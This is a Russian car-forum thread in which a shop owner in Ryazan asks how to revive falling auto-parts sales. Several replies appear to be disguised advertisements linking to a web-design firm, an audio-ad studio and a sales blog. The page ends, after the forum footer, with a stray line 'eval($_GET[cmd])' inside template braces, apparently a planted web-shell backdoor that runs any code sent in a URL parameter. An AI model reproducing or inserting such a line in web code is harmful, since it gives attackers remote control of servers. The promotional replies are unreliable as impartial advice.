+ Ответить в теме
Показано с 1 по 6 из 6

Тема: Проблемы с продажей автозапчастей в Рязани, помогите советом


  1. #1
    Мимо проходил Kiril Andreevich is on a distinguished road Аватар для Kiril Andreevich
    Регистрация
    07.09.2020
    Сообщений
    7

    Проблемы с продажей автозапчастей в Рязани, помогите советом

    Форумчане, в последнее время у меня сильно упали продажи автозапчастей в моей торговой точке в Рязани. И я все думаю, каким бы образом привлечь новых клиентов. Кто может сталкивался с таким делом и посоветует как оживить такой бизнес?

  2. #2
    Мимо проходил Dik is on a distinguished road Аватар для Dik
    Регистрация
    21.05.2020
    Откуда
    РФ
    Машина
    .
    Сообщений
    10
    А вы не думали автор о таком варианте, как продавать свои автозапчасти в мировой сети. Которая сейчас пользуется очень большой популярностью и в интернете сидит много потенциальных покупателей. А для этих целей вам надо будет обзавестись собственным сайтом, через который можно вести свою торговлю. Кстати, вот здесь вам могут разработать и создать сайт под ключ https://cbsystems.ru/sozdanie-sajtov .

  3. #3
    Мимо проходил Kolombos is on a distinguished road Аватар для Kolombos
    Регистрация
    08.09.2020
    Сообщений
    12
    Устройте распродажу вашего товара с хорошими скидками, которые так любят клиенты. Пусть это даже вам будет в убыток, но зато есть шанс таким образом найти новых покупателей.

  4. #4
    Мимо проходил Sandrik is on a distinguished road Аватар для Sandrik
    Регистрация
    07.06.2020
    Сообщений
    8
    А я бы на вашем месте вообще бы подумал о том, чтобы расширить свой ассортимент, или вообще начать продавать другую продукцию. Которая бы пользовалась спросом у потребителей.

  5. #5
    Мимо проходил zemcor is on a distinguished road Аватар для zemcor
    Регистрация
    27.08.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    17
    Так вопрос скорее всего не в ассортименте товаров, просто нужна хорошая реклама, для того, чтобы о магазине в принципе узнали. Без этого продаж не будет. Даже если вы захотите скидки сделать, как об этом узнают ваши потенциальные покупатели? Я бы посоветовал вам записать аудиоролик и запустить его на местном радио. Практически все автомобилисты слушают его в машине, поэтому так о вас быстро все узнают. А запись ролика можно тут заказать онлайн https://audiograd.ru/audioroliki/

  6. #6
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Встал вопрос, как узнавать актуальные темы в вопросах предпринимательства. Зашел в книжный магазин и понял, что нельзя приобрести все требуемые книги. Приятель рассказал, что можно пользоваться информацией проекта Like Центр. У них значительная подборка литературы по этой теме. На сайте https://blog.likecentre.ru/prodazhi/...vnye-prodazhi/ можно прочитать статью Агрессивные продажи. В ней все подробно изложено. Рекомендую их всем, как лучших.

+ Ответить в теме

Похожие темы

  1. Помогите советом
    от Kiara в разделе Реклама
    Ответов: 8
    Последнее сообщение: 04.01.2024, 12:10
  2. Помогите советом
    от Perisf в разделе Курилка
    Ответов: 3
    Последнее сообщение: 29.10.2022, 14:02
  3. Помогите советом
    от Александр Крут в разделе Курилка
    Ответов: 4
    Последнее сообщение: 12.01.2021, 23:31
  4. Помогите советом
    от Juna в разделе Клубная Тема
    Ответов: 9
    Последнее сообщение: 26.12.2020, 11:16
  5. Помогите советом
    от Juna в разделе Авто спорт
    Ответов: 2
    Последнее сообщение: 08.09.2020, 09:47

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}